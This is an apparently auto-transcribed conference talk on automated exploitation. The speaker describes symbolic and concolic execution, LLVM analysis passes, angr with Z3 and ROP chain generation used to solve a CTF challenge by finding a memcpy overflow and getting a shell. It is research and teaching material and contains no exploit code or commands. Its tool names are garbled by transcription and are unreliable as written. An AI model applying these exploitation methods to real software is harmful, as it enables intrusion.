 All right, so this is a slide deck that I put together kind of as, this is better I think, in Odyssey or my Odyssey through exploring this field of creating a system which can automatically exploit an application for me. What's the motivation behind this? So as we know, especially if you're in vulnerability research or malware or any sort of analysis work, a lot of its manual in programs and systems now have become increasingly difficult to exploit. So you have larger surface areas, you have to have more areas to look at and there's more mitigations in a system like stack cookies, heap cookies, different checks in the kernel. So things like that that you have to work around and deal with to exploit a program. So in a reaction to this, people have gotten smarter. So researchers have learned the systems better. They've created tools to help them analyze these larger programs. So in general, the process gets more involved and a lot of this work is funded by the government for government funded activities on pen testers. So they write tools perhaps to help them analyze extremely large networks or extremely large systems that they have to pen test for a company. And then also for CTF, right? So CTF is a great example for this because it's like a small scale version of the above two. So you have smaller problems and in some cases you write tools to help you analyze these smaller programs or challenges during a CTF. So you write small tools to help you. So my talk today is going to focus on writing an automated exploit tool. So a tool that helps me automatically exploit a program for CTF because it's the smallest of these three different types of programs and it's a good, good example. So for those of you who aren't familiar, CTF is when you get a binary, you have to own it or exploit it to get a flag. And in the case for the government or pen testers that might be getting a shell or getting something else. And then you get on scoreboards like this, of course, for fame and glory. So fake internet points. So in the past, how do we do this? All researchers out there, they use static analysis, hexeditors, digging through the assembly or disassembly in IDA, and also dynamic analysis. So you use tools like to the terminal and you're running it and you're observing the environment. Maybe memory dumps in the VM, replaying it, manual analysis in conjunction with live debugging. But you're still sitting there at a computer using these different tools to dynamically analyze a program, but it's still manual. So a lot of that is still thought-intensive, time-intensive, and also maybe CPU-intensive if you're fuzzing a program, looking for crashes or something like that. So an example of this is something I found myself doing more than I care to admit. But you're stepping through a program in GDB looking for maybe a crash or an if branch and a crack me or an obfuscated piece of malware. And suddenly this is you and it's four in the morning and you're still at your terminal stepping through GDB and you're wondering why on earth you chose this field. But we're smarter than that. We have had stack overflows since the 90s, and so we should not have to be doing this ever again or doing this manually. We should be able to automate this exploit process so we don't have to be that guy at his terminal at four in the morning. All right, so this is just an agenda of my talk today. So first of all, some background into automated exploitation. It's been getting a lot of press recently with the cybergrann challenge in the US, which is some research funded by DARPA to create a system which automatically exploits programs as well as automatically generates patches for these programs. And part of the research behind automated exploitation has kind of narrowed down two elements to automated exploitation. So two different steps that you have to do to automatically exploit a program. The first is to define the bug that you're looking for in terms of primitives. So for instance, the simplest example is let's say stack overflow, memory corruption. You have to define this sort of bug in terms of read and write primitives. And that way you can encode these primitives into your tool, which will then automatically look for them in the program. Now, there's a lot of interesting work being done on this. Sean Helan has done some of the first research papers in the past few years in this field have come from him. He's based in England, but he does a lot of program analysis work as well. David Brumley and his team at Carnegie Mellon, and they do a lot of work for CGC actually, so CGC funded. And they will be potentially playing in DEF CON this year as a team or their automated bot will be playing as a team at DEF CON this year. All right, so like I said, we're breaking up automated exploitation into two parts. So you have to, first of all, narrow down the vulnerability you're looking for. So define its primitives, define the vulnerability that you want your program to search for. Then you have to figure out how can I get to that vulnerable piece of code in the program? What sort of inputs required to get me there? What's the state of the system? What's the state of memory that will get me to that piece of code? So for instance, a simple example is a crack me where if you enter a certain password, that password will be in memory at a certain location as user input. And when that input is correct, you'll get to the vulnerable piece of code maybe. The second half of the puzzle is to profit from the vulnerability. So once you get there, how can I create a tool that will automatically give me a payload? So using the gadgets in the system or in the program itself. How can I use this crash that I find dynamically to then also get me a shell dynamically or whatever else you might want to do. So like I said, both areas, there's work being done on them. And today, I'm going to focus on the first problem. So discovery as well as exploiting it, or I show that, but I don't talk as much depth about that. So just to clarify what I'm talking about for the first part of automated exploitation. So discovery of the vulnerability. This is a simple CFG, like you might see an IDA or something. And this vulnerable piece of code is the red box. And that box is unknown to us. And so in the common example, like fuzzing, for instance, you generate input, which gets you down all possible paths. So you touch all possible basic blocks in the program that can execute. And so here you have three, and then you'd have to generate more. And it gets exponentially more time consuming or costly. But obviously, this branch of the CFG is the one we want to actually have executed. So that's our target branch. And we want to be able to automatically return this green line, or that target branch in CFG. So for the second part of automated exploitation for profiting from a vulnerability, so automatically generating shell code or payload or something like that, there's also work being done on that. And this is just an example project of that. It's the LLVM RopGadget project. And that simply is an LLVM pass, which takes in a program and gives you a RopChain that you can use using the gadgets from the program. And that's something that I found interesting you might want to check out. All right, so for this talk, I was like, all right, if I make a tool, we need a target for this tool. Which should I automatically try and exploit? So at the beginning of this talk, I mentioned that CTF is the smaller kind of easier to understand version of things like Windows 8, right? I'm not going to write a tool that gives me Windows 8 bugs. I wouldn't be sharing that, I'm sorry. Or Jeeps are also very common. Now I think Talknext is about cars. But I chose to do a Wargame or a CTF challenge. So I don't know if anyone's heard of Poneable.kr. It's a great site run by the Koreans. And there's a bunch of really great Poneable challenges there. So they have some Android ones, some Windows ones, and some interesting ones like this, which is an automated exploitation challenge. And I'm like, wow, this is perfect. I can make a tool that will solve this for me. So the premise of the challenge is that you connect to a server and you have 10 seconds to Pone, so get a shell on a randomly generated binary that they serve down to you in Hex, which is awesome. So just to clarify, we have a random binary. And we have some things that we can assume about it. So we know that we can give it input. And we know that it does some operations on it. But those operations change each time. So just like maybe a real program, we want our tool to be able to handle all types of operations. So we want our tool to just take in a program and solve it for us. And we don't want to have to look into it at all. We don't have to open up the program in IDA or do any sort of dynamic analysis of the program because we only have 10 seconds. So our tool has to automatically do everything for us. So the idea is that we want to make a tool that, first of all, finds vulnerability. Second, gets us input to make the program crash. So finds that green line in the CFG, which will get us to the vulnerable basic block in the program. And we also want to generate a payload automatically that will get us the shell so we can get a flag. And I think this one was worth 500 points, which was pretty good. All right, so this is just another depiction of what the challenge was. We know our input goes here. And all the operations are like a black box to us. We don't know what they are. We don't have time to look at them. We have to write a tool that solves this, gets us down the screen path, and exploits this memory corruption bug, is what it turned out to be. But we obviously have to automatically infer that. So how can we do this? Sounds kind of magic, right? Like in 10 seconds, that's not a lot of time. How can we do this? So this is when program analysis comes in. And we want to be able to take this binary and analyze it. So first of all, what is program analysis? This is unlike automated exploitation less talked about. It's more of a research topic. It's kind of boring because it is a little boring initially. But if anyone's done any compiler theory or compiler back ends here, this is basically the program analysis started out as. Because program analysis is when you write a tool that can look at a program and tell you something about it in terms of correctness and optimization. And optimization, obviously, is very applicable to compilers. But correctness will tell us, are all the possible paths that we can traverse in a program, the expected paths? And then optimization, of course, we don't care about as much, but can we make this path any shorter and do the same thing effectively? The semantic equivalence. All right, so how does this help us with automated exploitation? So now we're taking a step back from defining the program in terms of correctness. And looking at program analysis, software analysis, as a field, you can kind of break it up into three different levels or tiers. So you add a very basic level of program analysis. You have instrumenting, which is the most commonly used. And this is a pretty manual. And as you move down, you decrease the manual element of it, but you increase the program analysis element of it. I'm in symbolic and concoct execution are the ones I'm gonna focus on today. And I'm gonna combine those to make my tool. All right, so what do we care about? Well, how can instrumentation be useful? Well, in program analysis, instrumentation is commonly used to hijack the environment. So you make the environment record things about the system at runtime or change things or change artifacts in the system at runtime to force a certain state in a program. And this allows you to gather report observations of the running program and hopefully cause the program to go down different paths in the CFG as it's running. And to record that, to tell you something about maybe what a vulnerable path could be. Now, a common example of this is in fuzzing when you generate tons and tons of input and you have a mutator, which generates input intelligently based on the results of the program. So let's say you know that if your VM is in a certain state, you get more code coverage or more code executes and you want that to happen. So you have to maintain that artifact in the VM to cause it to execute more code and hopefully execute until it reaches a crashing point. So this is a very common type of instrumentation. Another common instrumentation type is instruction counting. This is kind of a favorite example of mine. And this is when you hook into the code and you say every time an instruction is executed increment a counter. It's very simple. And you just return the total number of instructions that are executed in any given run. And that tells you something about code coverage for input to a program. And I'll talk more about this later in its application. But it's very useful for crack maze and things like that. But not a lot of real world application. So symbolic execution. We are doing some with symbolic execution. When I started going into this topic I had no clue what it was. But symbolic execution is purely static. What it does is it takes in a program, usually in IR, LLVM IR in this case. And it generates a symbolic path for every possible path in the program. And this allows you to analyze those paths and say, okay, well, this path is interesting to me. I wanna solve for it. And it will actually give you concrete values for what variables in that path have to be to make it true or to make that path execute fully. I'll give an example in a second. And this is very useful. It allows us to first of all enumerate all possible execution paths of the program and tell us what the conditions have to be in order to get those paths to execute. So this is very useful because with fuzzing you may actually have a case where a certain path is never executed because you simply never mutate your input or the environment to cause that path to execute. But with symbolic execution and analysis, because you're enumerating all possible paths statically, you know that, oh, hey, this path never got executed with fuzzing. Why is that? And symbolic execution will tell you, oh, the value in this memory location x has to be four. And you can set that then and cause that path to execute. So that's why it's faster than brute forcing because instead of potentially running a fuzzer forever, you can more tailor your system immediately to what you want. So an example of symbolic execution, in the base case, so in the fuzzing case, like the normal way of doing it, you generate all possible A, B, and Cs to this program in order to try and get this assert to be true. So let's say you're fuzzing. This could actually run forever, right? Because their integers are unbounded. You could run forever. I would never get this assert to be true. But in the symbolic execution case, you generate all possible paths. So this is a common example. People have probably seen it, but here you know that all possible paths aren't defined in this tree. You wanna get to the one here where the assert is true. And you know that the certain values then have to match these conditions. And you can feed those conditions to a SAT solver or an SMT solver like Z3, for instance, to give you the values that make this equation to be true, to then be able to execute down this path. Now, cancolic execution is basically symbolic execution except it includes some concrete execution of the program. And this is just, this is kind of a wordy way of saying it, but it's simply to get around things like library loads or other things which you do not want to ever generate a full set of symbolic paths for. A common example of this is like libc, for instance. If you had a program that loaded libc in the beginning, you wouldn't wanna generate all possible execution paths of libc because you'd quickly run out of all memory on your computer. But with cancolic execution, it allows us to execute up until that point in the program and then symbolically analyze our target function. So that's, it just saves time basically for symbolic execution. An example of this, I'll kind of go quickly through it. So that's the base case. And you concretely execute up until our target point in the program, which is the beginning of this function here with the if statement. And then you build up the symbolic path as you go through that function. And you base the constraints or your input on the constraints that are modeled. So it's kind of like a feedback loop, which is something that makes everything go quicker. So a feedback loop is a common technique, especially used by the CGC teams in the States, but it involves concrete execution and symbolic execution, but also some fuzzing as well. So you concretely execute stuff you don't care about. You symbolically look at the path that you do care about. And if the constraints aren't tight enough, you can fuzz a little bit to see what will get you executing farther into the program. And this is especially important for larger programs which there's more than one function. So the state of function X might rely on the state of function A, which got called three times 40 seconds ago in the program or something like that. And that's useful for that. All right, so I talked about what program analysis is, but what are some applications of this? So for instance, instrumentation. This is the most common one. Like I said, you probably have heard of these tools. PIN tools is very powerful, KMU. And the example of PIN tool that I'm giving here is based on instruction counting. So there was a fun reversing challenge put out last year by FireEye called the Flare on Reversing Challenges. And one of those was a simple obfuscated crack me, that if you loaded it into Ida, it was so large it crashed it. So the simple way is to use PIN tool or some instruction counter, which allows us to basically count to see if our fuzzed input is getting us down more code or not. So this is, let's say we fuzz the first character and we try from A all the way to Z. And we figure out through analysis that the letter F caused more code to be executed. So our instruction counter returned a higher number than in all the other cases. And then we can move on. So that continued down until you got the whole flag. So that's just a simple example of that. For symbolic execution, there's less tools out there. Program analysis in this field is definitely a little newer, especially outside of academia. But common tools for this are CLE and SAGE. I believe SAGE is not a Microsoft internal tool anymore, but parts of it still are something. Either way, a lot of these tools then use Z3 as a backend to sell for the paths that are extracted. And in the case today, I'm going to use LLVM pass. So I'm just using LLVM to pull out the IR of the program and analyze it. So I'm gonna show a tool based on pure symbolic execution using LLVM and then concollic execution as well. In this case, I'm gonna use Anger, which is a tool put out by some of the researchers at UCSB. But there's other tools out there like PyCMU and Triton. Triton's put out by Quark's lab. It's also quite a powerful tool and I believe it's on GitHub. So some assumptions I made going into this. I wanted my tool to basically find the vulnerability dynamically, but in order to do that, I had to give it some pieces of information. So in this case, I had to assume that it was a memory corruption bug and I was looking for the read and write primitives, which define a simple stack overflow. In this case, there happened to be a vulnerable mem copy like I said earlier, but I could still encode that and look for that vulnerability dynamically. So I wanted to be able to get to that vulnerability and then I knew I wanted to wrap from there. So there's two different parts to my exploit. And like I said, I'm going to dynamically acquire all of these things or my tool will find those for me. All right, so my first tool is purely symbolic and this is using LLVM. It's an LLVM pass. It operates on bytecode. And in order to do this, I determined I would use a dominator tree. So a dominator tree is going to be useful for us because it's gonna organize the CFG for me. So instead of blindly traversing different parts of the program, I'm going to try and optimize it and traverse the longest path first and go from there. Assuming that the longest path is going to have the most code and therefore hopefully the most interesting code. And then from there, I had to also build my LLVM pass to use something called a useDevChain. And unfortunately, there was no useDevChain support in the LLVM trunk. So I wrote a tool or a library that does this as well. You can also find this on GitHub. And this is useful because it traces variables on their definitions through the program across different paths in the dominator tree. So this is great because once I find the path that I want, I can pull out the useDevChain of each variable and then solve for what those variables have to be after all of the different functions and operations are applied to it way back when I enter my input. So what input do I have to be that after the variable traverses its entire useDevChain, it becomes the value that I actually want it to be? So I kind of turned this as flow-sensitive constraint analysis because I'm looking for the constraining elements of the path. All right, so the great thing about LLVM is this turned out to be easy to make. If you haven't looked into the LLVM project, it's a really powerful tool for program analysis and specifically for symbolic execution because it is a static pass that you apply to a program. And you can pull out the semantics very easily of the different variables and that's why making useDevChain for each variable I found to be actually rather easy. The one difficulty that I had here was if you don't have the source code, it's not as easy to compile down to LLVM bit code, obviously you have to actually lift the binary and translate that into LLVM bit code. So I used Mixemma here because it was an x86 binary, but you can use other tools as well. And that's also a different research area being looked into. And I've got to determine which is faster. So I then went ahead and, oh, you can download it at this URL if you want. So then I used Anger for the concollic tool to solve this problem. And I'm not gonna go into all the details here, but because it's concollic execution, I want to start it out as a blank project. So what Anger actually does is you load the program and it's almost like loading it into a VM or into like an instance of KeyMu. So it's blank, it's a blank slate. And then I told it to execute all the way up into the entry function or the function I care about. So just concretely execute all the libraries, build the state of the program. So get all the libc and everything else in there. And then start analyzing at this entry function. And these are all just elements of Anger. And so the important thing here was my input buffer. So I knew that my input buffer is what I wanted to solve for. And all these operations get applied to it. And at the end, I want to be able to know what my input buffer has to be that after all the, that gets me down to the path which contains this vulnerable address here. So it's going to solve and give me the input that I need to pass all the checks or all the operations that are applied to it. And the Anger does this automatically, which is awesome. They also use Z3 as a backend. And this is just the way you print things out. Anger is interesting because it's actually storing the input you need in memory. So you technically have to dump memory from this virtual machine to get the inputs that you need. All right, so I'm gonna show both tools kind of in action. And I kind of imagined it as a race against each other. All right, so this is the Anger tool being run. And I just locally hosted the Ponebles binary in this case. All right, and I will stop it there. So you can see here that it's pulling out different constraints that are being applied in this case. It was applying Zoring to even an odd bytes in my input. So my tool found that. It found the vulnerable mem copy in the program. So these are the conditions. This is the vulnerability. And it found that these are bad paths. These are paths which exit and do not get me to the vulnerable mem copy. So that's something that might be interesting to know later on. And then it also solved my path as well. Now like I said, I was focusing on the first half of the automated exploitation problem today. So that would be finding the input necessary to get to the vulnerability as well as finding the vulnerability. But in order to get the shell, I also had to automatically generate a Rop chain in this case, which I used the LLVM project for that I linked to earlier. And this ends up being the final payload. Total elapsed time wasn't even three seconds, so that's pretty good. And you can see here that I got a shell. And now we're gonna run the LLVM tool that I made. So this is doing a purely static analysis on the program. So you'd assume that the concolly execution script because it is concretely running some things would be faster. But in this case, symbolic execution was actually faster, which I found really interesting. So just going through it again, it found the same things. I printed out a little less, I guess, but these are the elements that the operations used to apply to my input. This is the input that I needed, which matches. And in this case, I used the same tool to generate the Rop chain, so it was the same Rop chain used and I got a shell. And now the interesting thing is here is that it was slower or faster than the concolly script. And I believe this is because of my dominator tree method of writing the script because I was using the dominator tree to traverse all possible paths in the program. It found the vulnerability faster and that actually is the most time-consuming part, which makes sense because discovery is always the hardest part, even automated discovery, I guess. So this is the shell, thanks. So moving on. Like I said, you can download the scripts that do both of those things online as well as the LLVM project I started for the use of chain and dominator tree analysis of programs. That's more for bug discovery and not necessarily for exploitation, but still pretty useful. But the future of exploitation, so it's tough, right, because we're still working with binaries and these applications and programs are getting harder and harder to analyze. For instance, things like Chrome in the Chrome sandbox. It's very difficult to look at these things because they're so complex and there's so many different mitigations and defenses put on them, so it's great, like defenses are getting better. Our programs are being hardened. And like I said before, the source is nice to have because in order to do a lot of program analysis on it, like LLVM, you need to compile it down into bitcode or intermediate representation. Now in the case of binaries, right, once you have machine code, it's very difficult to go backwards into the IR necessary to do program analysis. So you need tools that either run it, like KMU or Pintool, which works just on the machine code. Or you need tools like Micsema to, I think I have, oh, I guess I don't have that. Micsema to lift the code up into the IR, so that's a separate problem. So another difficulty that I think more research is going to have is it's easy to encode the primitives of memory corruption. Stack overflows have been around since the 90s, so those read and write primitives might be easier to encode into a static analysis pass. You can easily look for a buffer and see that it's copied and you see that it's being written into a location which could potentially not be the proper length. And then you could solve for a case where that length could be less than the length of your buffer. And that's something simple, that's something Z3 could solve for. My company also has released a tool for use after free primitives. So bugs like that are also easier to look at. You simply make use stuff chain and you say, okay, this variable is used down here, but there is a potential path in the program execution where that variable or object is freed. So it's something simple that you can do with static analysis on all possible program paths. But harder bugs are logic bugs and things like that which require more understanding or introspection into the program. So like I said, automated exploitation though seems to be the direction people are going towards. Can we define a program in terms of its correctness? So this is useful because like I said, why repeat something twice? Programs are getting larger, but if we can transcribe a vulnerability into a tool that looks for it automatically, that will end up being the way to go. And also, if we can prove that a program is without a certain class of bugs, that is something as well. We can say this program is provably secure. This program has been proven to not contain any memory corruption bugs or something like that. So that would be also an area to go into. So I'd like to thank Trail of Bits, Poneable.kr for letting me use their binary without even knowing it. And RPI sec my CTF team will be playing this weekend. We have two teams here, so go bother them. And any references I mentioned are right here. So if there's any questions I can take of them now or talk to me after. Thank you.